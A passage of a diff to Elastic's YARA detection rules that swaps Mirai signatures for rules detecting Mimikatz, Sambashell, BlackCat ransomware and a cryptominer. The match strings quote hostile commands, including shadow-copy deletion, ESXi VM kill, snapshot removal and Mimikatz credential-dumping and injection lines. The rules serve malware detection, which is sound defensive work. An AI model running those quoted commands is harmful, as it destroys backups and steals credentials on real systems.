75 tags = "FILE, MEMORY" - fingerprint = "35db945d116a4c9264af44a9947a5e831ea655044728dc78770085c7959a678e" - severity = 100 + fingerprint = "b8f71996180e5f03c10e39eb36b2084ecaff78d7af34bd3d0d75225d2cfad765" + threat_name = "Windows.Hacktool.Mimikatz" + severity = 99 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { CF 07 66 5F 10 F0 EB 0C 42 0B 2F 0B 0B 43 C1 42 E4 C2 7C 85 } + $a1 = { 44 30 00 38 00 } + $a2 = { 48 78 00 3A 00 } + $a3 = { 4C 25 00 30 00 } + $a4 = { 50 38 00 78 00 } + $a5 = { 54 5D 00 20 00 } + $a6 = { 58 25 00 77 00 } + $a7 = { 5C 5A 00 5C 00 } + $a8 = { 60 25 00 77 00 } + $a9 = { 64 5A 00 09 00 } + $a10 = { 6C 5A 00 0A 00 } + $a11 = { 68 25 00 77 00 } + $a12 = { 68 25 00 77 00 } + $a13 = { 6C 5A 00 0A 00 } + $b1 = { 6D 69 6D 69 C7 84 24 8C 00 00 00 6C 73 61 2E C7 84 24 90 00 00 00 6C 6F 67 } condition: - all of them + all of ($a*) or $b1 } -rule ELASTIC_Linux_Trojan_Mirai_3278F1B8 : FILE MEMORY +rule ELASTIC_Windows_Hacktool_Mimikatz_355D5D3A : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detection for Invoke-Mimikatz" author = "Elastic Security" - id = "3278f1b8-f208-42c8-a851-d22413f74dea" - date = "2021-01-12" - modified = "2021-09-16" + id = "355d5d3a-e50e-4614-9a84-0da668c40852" + date = "2021-04-14" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L1462-L1480" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "fc8741f67f39e7409ab2c6c62d4f9acdd168d3e53cf6976dd87501833771cacb" - logic_hash = "4d709e8e2062099ac06b241408e52bcb86bbf8163faaffbcff68a05f864e1b3f" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Hacktool_Mimikatz.yar#L79-L112" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "945245ca795e0a3575ee4fdc174df9d377a598476c2bf4bf0cdb0cde4286af96" + logic_hash = "c6b48ab2cc92deb507d7eead1fb6381ee40b698e84d9eaac45288f95dbda66b3" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "7e9fc284c9c920ac2752911d6aacbc3c2bf1b053aa35c22d83bab0089290778d" - severity = 100 + fingerprint = "9a23845ec9852d2490171af111612dc257a6b21ad7fdfd8bf22d343dc301d135" + threat_name = "Windows.Hacktool.Mimikatz" + severity = 90 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { D2 0F B6 C3 C1 E0 10 0F B6 C9 C1 E2 18 09 C2 0F B6 44 24 40 C1 } + $a1 = "$PEBytes32 = \"TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwc" + $a2 = "$PEBytes64 = \"TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwc" + $b1 = "Write-BytesToMemory -Bytes $Shellcode" + $b2 = "-MemoryAddress $GetCommandLineWAddrTemp" + $b3 = "-MemoryAddress $GetCommandLineAAddrTemp" + $c1 = "Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes64, $PEBytes32, \"Void\", 0, \"\", $ExeArgs)" fullword + $c2 = "Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes64, $PEBytes32, \"Void\", 0, \"\", $ExeArgs) -ComputerNam" + $c3 = "at: http://blog.gentilkiwi.com" + $c4 = "on the local computer to dump certificates." + $c5 = "Throw \"Unable to write shellcode to remote process memory.\"" fullword + $c6 = "-Command \"privilege::debug exit\" -ComputerName \"computer1\"" + $c7 = "dump credentials without" + $c8 = "#The shellcode writes the DLL address to memory in the remote process at address $LoadLibraryARetMem, read this memory" fullword + $c9 = "two remote computers to dump credentials." + $c10 = "#If a remote process to inject in to is specified, get a handle to it" fullword condition: - all of them + (1 of ($a*) or 2 of ($b*)) or 5 of ($c*) } -rule ELASTIC_Linux_Trojan_Mirai_Ab804Bb7 : FILE MEMORY +rule ELASTIC_Windows_Hacktool_Mimikatz_71Fe23D9 : FILE { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Subject: Benjamin Delpy" author = "Elastic Security" - id = "ab804bb7-57ab-48db-85cc-a6d88de0c84a" - date = "2021-01-12" - modified = "2021-09-16" + id = "71fe23d9-ee1a-47fb-a99f-2be2eb9ccb1a" + date = "2022-04-07" + modified = "2022-04-07" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L1482-L1500" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "8f0cc764729498b4cb9c5446f1a84cde54e828e913dc78faf537004a7df21b20" - logic_hash = "cef2ffafe152332502fb0d72d014c81b90dc9ad4f4491f1b2f2f9c1f73cc7958" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Hacktool_Mimikatz.yar#L114-L133" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "856687718b208341e7caeea2d96da10f880f9b5a75736796a1158d4c8755f678" + logic_hash = "6d1e84bb8532c6271ad3966055eac8d60ec019d8ae6632efb59463c35b46ad9b" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "b9716aa7be1b0e4c966a25a40521114e33c21c7ec3c4468afc1bf8378dd11932" + tags = "FILE" + fingerprint = "22b1f36e82e604fc3a80bb5abf87aef59957b1ceeb050eea3c9e85fb0b937db1" + threat_name = "Windows.Hacktool.Mimikatz" severity = 100 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 4A 75 05 0F BE 11 01 D0 89 C2 0F B7 C0 C1 FA 10 01 C2 89 D0 C1 } + $subject_name = { 06 03 55 04 03 [2] 42 65 6E 6A 61 6D 69 6E 20 44 65 6C 70 79 } condition: - all of them + int16 ( uint32(0x3C)+0x5c)==0x0001 and $subject_name } -rule ELASTIC_Linux_Trojan_Mirai_Dca3B9B4 : FILE MEMORY +rule ELASTIC_Windows_Hacktool_Mimikatz_B393864F : FILE { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Subject: Open Source Developer, Benjamin Delpy" author = "Elastic Security" - id = "dca3b9b4-62f3-41ed-a3b3-80dd0990f8c5" - date = "2021-01-12" - modified = "2021-09-16" + id = "b393864f-a9b0-47e7-aea4-0fc5a4a22a82" + date = "2022-04-07" + modified = "2022-04-07" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L1502-L1520" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "a839437deba6d30e7a22104561e38f60776729199a96a71da3a88a7c7990246a" - logic_hash = "f85dfc1c00706d7ac11ef35c41c471383ef8b019a5c2566b27072a5ef5ad5c93" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Hacktool_Mimikatz.yar#L135-L154" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "8206ce9c42582ac980ff5d64f8e3e310bc2baa42d1a206dd831c6ab397fbd8fe" + logic_hash = "d09cb7f753675e0b6ecd8a7977ca7f8d313e5d525f05170fc54b265c2ae6c188" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "b0471831229be1bcbcf6834e2d1a5b85ed66fb612868c2c207fe009ae2a0e799" + tags = "FILE" + fingerprint = "bfd497290db97b7578d59e8d43a28ee736a3d7d23072eb67d28ada85cac08bd3" + threat_name = "Windows.Hacktool.Mimikatz" severity = 100 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 83 45 F4 01 8B 45 F4 3B 45 F0 75 11 48 8B 45 F8 48 2B 45 D8 } + $subject_name = { 06 03 55 04 03 [2] 4F 70 65 6E 20 53 6F 75 72 63 65 20 44 65 76 65 6C 6F 70 65 72 2C 20 42 65 6E 6A 61 6D 69 6E 20 44 65 6C 70 79 } condition: - all of them + int16 ( uint32(0x3C)+0x5c)==0x0001 and $subject_name } -rule ELASTIC_Linux_Trojan_Mirai_Ae9D0Fa6 : FILE MEMORY +rule ELASTIC_Windows_Hacktool_Mimikatz_1Ff74F7E : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Windows Hacktool Mimikatz (Windows.Hacktool.Mimikatz)" author = "Elastic Security" - id = "ae9d0fa6-be06-4656-9b13-8edfc0ee9e71" - date = "2021-01-12" - modified = "2021-09-16" + id = "1ff74f7e-ec5a-45ae-b51b-2f8205445cc8" + date = "2023-05-09" + modified = "2023-06-13" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L1522-L1539" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "8da5b14b95d96de5ced8bcab98e23973e449c1b5ca101f39a2114bb8e74fd9a5" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Hacktool_Mimikatz.yar#L156-L175" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "1b6aad500d45de7b076942d31b7c3e77487643811a335ae5ce6783368a4a5081" + logic_hash = "f47f760b4c373a073399c69681e76eb9dde6cfdb36c1cc31d7131376493931c0" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "ca2bf2771844bec95563800d19a35dd230413f8eff0bd44c8ab0b4c596f81bfc" + fingerprint = "6775be439ad1822bcaa04ed2d392143616746cfd674202aa29773c98642346f4" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 83 EC 04 8A 44 24 18 8B 5C 24 14 88 44 24 03 8A 44 24 10 25 FF 00 } + $a1 = { 74 65 48 8B 44 24 28 0F B7 80 E0 00 00 00 83 F8 10 75 54 48 8B 44 } + $a2 = { 74 69 48 8B 44 24 28 0F B7 80 D0 00 00 00 83 F8 10 75 58 48 8B 44 } condition: all of them } -rule ELASTIC_Linux_Trojan_Mirai_612B407C : FILE MEMORY +rule ELASTIC_Linux_Trojan_Sambashell_F423755D : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Linux Trojan Sambashell (Linux.Trojan.Sambashell)" author = "Elastic Security" - id = "612b407c-fceb-4a19-8905-2f5b822f62cc" + id = "f423755d-60ec-4442-beb1-0820df0fe00b" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L1541-L1559" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "7833bc89778461a9f46cc47a78c67dda48b498ee40b09a80a21e67cb70c6add1" - logic_hash = "6514725a32f7c28be7de5ff6fe1363df7c50e2cd6c8c79824ec4cbeadda2ca31" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Sambashell.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "bd8a3728a59afbf433799578ef597b9a7211c8d62e87a25209398814851a77ea" + logic_hash = "b93c671fae87cd635679142d248cb2b754389ba3b416f3370ea331640eb906ab" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "c48c26b1052ef832d4d6a106db186bf20c503bdf38392a1661eb2d3c3ec010cd" + fingerprint = "ea13320c358cadc8187592de73ceb260a00f28907567002d4f093be21f111f74" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -79485,203 +79967,217 @@ rule ELASTIC_Linux_Trojan_Mirai_612B407C : FILE MEMORY os = "linux" strings: - $a = { 11 B2 73 45 2B 7A 57 E2 F9 77 A2 23 EC 7C 0C 29 FE 3F B2 DE 28 6C } + $a = { 00 01 00 00 00 FC 0E 00 00 FC 1E 00 00 FC 1E 00 00 74 28 00 00 } condition: all of them } -rule ELASTIC_Linux_Trojan_Mirai_D5Da717F : FILE MEMORY +rule ELASTIC_Multi_Ransomware_Blackcat_Aaf312C3 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Multi Ransomware Blackcat (Multi.Ransomware.BlackCat)" author = "Elastic Security" - id = "d5da717f-3344-41a8-884e-8944172ea370" - date = "2021-04-06" - modified = "2021-09-16" + id = "aaf312c3-47b4-4dab-b7fc-8a2ac9883772" + date = "2022-02-02" + modified = "2023-09-20" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L1561-L1579" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "1f6bcdfc7d1c56228897cd7548266bb0b9a41b913be354036816643ac21b6f66" - logic_hash = "034dae5bea7536e8c8aa22b8b891b9c991b94f04be12c9fe6d78ddf07a2365d9" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Multi_Ransomware_BlackCat.yar#L1-L20" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "0c6f444c6940a3688ffc6f8b9d5774c032e3551ebbccb64e4280ae7fc1fac479" + logic_hash = "0771ab5a795af164a568bda036cccf08afeb33458f2cd5a7240349fca9b60ead" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "c3674075a435ef1cd9e568486daa2960450aa7ffa8e5dbf440a50e01803ea2f3" + fingerprint = "577c7f24a7ecf89a542e9a63a1744a129c96c32e8dccfbf779dd9fc6c0194930" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "multi" strings: - $a = { 00 00 66 83 7C 24 34 FF 66 89 46 2C 0F 85 C2 } + $chacha20_enc = { EF D9 F3 0F 7F 14 3B F3 0F 7F 5C 3B 10 83 C7 20 39 F8 75 D0 8B } + $crc32_imp = { F3 0F 6F 02 66 0F 6F D1 66 0F 3A 44 CD 11 83 C0 F0 83 C2 10 66 0F 3A 44 D4 00 83 F8 0F 66 0F EF C8 66 0F EF CA } condition: all of them } -rule ELASTIC_Linux_Trojan_Mirai_D33095D4 : FILE MEMORY +rule ELASTIC_Multi_Ransomware_Blackcat_00E525D7 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Multi Ransomware Blackcat (Multi.Ransomware.BlackCat)" author = "Elastic Security" - id = "d33095d4-ea02-4588-9852-7493f6781bb4" - date = "2021-04-06" - modified = "2021-09-16" + id = "00e525d7-a8a6-475f-89ad-607c452aea1e" + date = "2022-02-02" + modified = "2022-08-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L1581-L1599" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "72326a3a9160e9481dd6fc87159f7ebf8a358f52bf0c17fbc3df80217d032635" - logic_hash = "b7feaec65d72907d08c98b09fb4ac494ceee7d7bd51c09063363c617e3f057a4" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Multi_Ransomware_BlackCat.yar#L22-L43" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "0c6f444c6940a3688ffc6f8b9d5774c032e3551ebbccb64e4280ae7fc1fac479" + logic_hash = "e44625d0fa8308b9d4d63a9e6920b4da4a2ce124437f122b2c8fe5cf0ab85a6b" score = 75 - quality = 75 + quality = 50 tags = "FILE, MEMORY" - fingerprint = "20c0faab6aef6e0f15fd34f9bd173547f3195c096eb34c4316144b19d2ab1dc4" + fingerprint = "631e30b8b51a5c0a0e91e8c09968663192569005b8bffff9f0474749788e9d57" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "multi" strings: - $a = { 00 00 66 83 7C 24 54 FF 66 89 46 04 0F 85 CB } + $a1 = "ata\",\"boot\",\"config.msi\",\"google\",\"perflogs\",\"appdata\",\"windows.old\"],\"exclude_file_names\":[\"desktop.ini\",\"aut" + $a2 = "locker::core::windows::processvssadmin.exe delete shadows /all /quietshadow_copy::remove_all=" ascii fullword + $a3 = "\\\\.\\pipe\\__rust_anonymous_pipe1__." ascii fullword + $a4 = "--bypass-p-p--bypass-path-path --no-prop-servers \\\\" ascii fullword condition: all of them } -rule ELASTIC_Linux_Trojan_Mirai_4E2246Fb : FILE MEMORY +rule ELASTIC_Multi_Ransomware_Blackcat_C4B043E6 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Multi Ransomware Blackcat (Multi.Ransomware.BlackCat)" author = "Elastic Security" - id = "4e2246fb-5f9a-4dea-8041-51758920d0b9" - date = "2021-04-06" - modified = "2021-09-16" + id = "c4b043e6-ff5f-4492-94e3-fd688d690738" + date = "2022-09-12" + modified = "2022-09-29" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L1601-L1619" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "1f6bcdfc7d1c56228897cd7548266bb0b9a41b913be354036816643ac21b6f66" - logic_hash = "6d2e1300286751a5e1ae683e9aab2f59bfbb20d1cc18dcce89c06ecadf25a3e6" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Multi_Ransomware_BlackCat.yar#L45-L63" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "45b8678f74d29c87e2d06410245ab6c2762b76190594cafc9543fb9db90f3d4f" + logic_hash = "1262ca76581920f08a6482ead68023fdfff08a9ddd19e00230054e3167dc184c" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "23b0cfabc2db26153c02a7dc81e2006b28bfc9667526185b2071b34d2fb073c4" + fingerprint = "3e89858e90632ad5f4831427bd630252113b735c51f7a1aa1eab8ba6e4c16f18" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "multi" strings: - $a = { 00 00 B8 01 00 00 00 31 DB CD 80 EB FA 8D 8B 10 } + $a = { 28 4C 8B 60 08 4C 8B 68 10 0F 10 40 28 0F 29 44 24 10 0F 10 } condition: all of them } -rule ELASTIC_Linux_Trojan_Mirai_D5981806 : FILE MEMORY +rule ELASTIC_Multi_Ransomware_Blackcat_70171625 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Multi Ransomware Blackcat (Multi.Ransomware.BlackCat)" author = "Elastic Security" - id = "d5981806-0db8-4422-ad57-5d1c0f7464c3" - date = "2021-04-06" - modified = "2021-09-16" + id = "70171625-c29b-47c1-b572-2e6dc846a907" + date = "2023-01-05" + modified = "2023-09-20" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L1621-L1639" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "784f2005853b5375efaf3995208e4611b81b8c52f67b6dc139fd9fec7b49d9dc" - logic_hash = "e625323543aa5c8374a179dfa51c3f5be1446459c45fa7c7a27ae383cf0f551b" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Multi_Ransomware_BlackCat.yar#L65-L91" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "0c6f444c6940a3688ffc6f8b9d5774c032e3551ebbccb64e4280ae7fc1fac479" + logic_hash = "fd07acd7c8627754f000c44827848bf65bcaa96f2dfb46e41542f3c9b40eee78" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "b0fd8632505252315ba551bb3680fa8dc51038be17609018bf9d92c3e1c43ede" + fingerprint = "f3f70f92fe9c044f4565fca519cb04a3a54536985c2614077ef92c3193fff9c1" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "multi" strings: - $a = { 3F 00 00 66 83 7C 24 38 FF 66 89 46 04 0F 85 EA } + $str0 = "}RECOVER-${EXTENSION}-FILES.txt" + $str1 = "?access-key=${ACCESS_KEY}" + $str2 = "${NOTE_FILE_NAME}" + $str3 = "enable_network_discovery" + $str4 = "enable_set_wallpaper" + $str5 = "enable_esxi_vm_kill" + $str6 = "strict_include_paths" + $str7 = "exclude_file_path_wildcard" + $str8 = "${ACCESS_KEY}${EXTENSION}" condition: all of them } -rule ELASTIC_Linux_Trojan_Mirai_C6055Dc9 : FILE MEMORY +rule ELASTIC_Multi_Ransomware_Blackcat_E066D802 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Multi Ransomware Blackcat (Multi.Ransomware.BlackCat)" author = "Elastic Security" - id = "c6055dc9-316b-478d-9997-1dbf455cafcc" - date = "2021-04-06" - modified = "2021-09-16" + id = "e066d802-b803-4e35-9b53-ae1823662483" + date = "2023-07-27" + modified = "2023-09-20" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L1641-L1659" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "c1718d7fdeef886caa33951e75cbd9139467fa1724605fdf76c8cdb1ec20e024" - logic_hash = "4d9d7c44f0d3ae60275720ae5faf3c25c368aa6e7d9ab5ed706a30f9a7ffd3b8" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Multi_Ransomware_BlackCat.yar#L93-L113" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "00360830bf5886288f23784b8df82804bf6f22258e410740db481df8a7701525" + logic_hash = "00fbb8013faf26c35b6cd8a72ebc246444c37c5ec7a0df2295830e96c01c8720" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "b95f582edf2504089ddd29ef1a0daf30644b364f3d90ede413a2aa777c205070" + fingerprint = "05037af3395b682d1831443757376064c873815ac4b6d1c09116715570f51f5d" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "multi" strings: - $a = { 83 7F 43 80 77 39 CF 7E 09 83 C8 FF 5A 5D 8A 0E } + $a1 = "esxcli vm process kill --type=force --world-id=Killing" + $a2 = "vim-cmd vmsvc/snapshot.removeall $i" + $a3 = "File already has encrypted extension" condition: - all of them + 2 of them } -rule ELASTIC_Linux_Trojan_Mirai_3B9675Fd : FILE MEMORY +rule ELASTIC_Multi_Ransomware_Blackcat_0Ffb0A37 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Multi Ransomware Blackcat (Multi.Ransomware.BlackCat)" author = "Elastic Security" - id = "3b9675fd-1fa1-4e15-9472-64cb93315d63" - date = "2021-01-12" - modified = "2021-09-16" + id = "0ffb0a37-e4c3-45be-bd4d-7033e88635aa" + date = "2023-07-29" + modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L1661-L1679" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "4ec4bc88156bd51451fdaf0550c21c799c6adacbfc654c8ec634ebca3383bd66" - logic_hash = "61ff7cb8d664291de5cf0c82b80cf0f4001c41d3f02b7f4762f67eb8128df15d" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Multi_Ransomware_BlackCat.yar#L115-L134" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "57136b118a0d6d3c71e522ea53e3305dae58b51f06c29cd01c0c28fa0fa34287" + logic_hash = "4f28281e4b23868c63438d4800b9e5978426e7c98b6142ef8082cfd251cafe57" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "40a154bafa72c5aa0c085ac2b92b5777d1acecfd28d28b15c7229ba5c59435f2" + fingerprint = "319b956ddd57bea22cbee7e521649969c5b1f42ee4af49ad6f25847fb8ee9559" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "multi" strings: - $a = { 78 10 85 C9 75 65 48 8B 8C 24 A0 00 00 00 48 89 48 10 0F B6 4C } + $a1 = { C8 C8 00 00 00 89 20 00 00 45 01 00 00 32 22 08 0A 20 64 85 } + $a2 = { 67 69 74 68 75 62 2E 63 6F 6D 2D 31 65 63 63 36 32 39 39 64 62 39 65 63 38 32 33 2F 73 69 6D 70 6C 65 6C 6F 67 2D } condition: all of them } -rule ELASTIC_Linux_Trojan_Mirai_1C0D246D : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Xpaj_Fdbd614E : FILE MEMORY { meta: - description = "Based off community provided sample" + description = "Detects Linux Cryptominer Xpaj (Linux.Cryptominer.Xpaj)" author = "Elastic Security" - id = "1c0d246d-dc23-48d6-accb-1e1db1eba49b" - date = "2021-04-13" + id = "fdbd614e-e628-43ff-86d4-1057f9d544ac" + date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L1681-L1700" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "211cfe9d158c8a6840a53f2d1db2bf94ae689946fffb791eed3acceef7f0e3dd" - logic_hash = "7a101e6d2265e09eb6c8d0f1a2fe54c9aa353dfd8bd156926937f4aec86c3ef1" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Xpaj.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "3e2b1b36981713217301dd02db33fb01458b3ff47f28dfdc795d8d1d332f13ea" + logic_hash = "70e6450f98411750361481aaad0d3ea079f58b1ae09970f04da09c20137a50fa" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = 